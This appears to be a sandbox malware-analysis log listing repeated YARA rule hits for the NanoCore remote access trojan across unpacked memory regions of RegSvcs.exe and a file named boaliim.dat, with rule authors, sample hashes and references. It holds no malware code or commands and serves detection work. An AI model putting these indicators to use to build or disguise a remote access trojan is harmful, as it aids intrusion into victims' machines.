Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
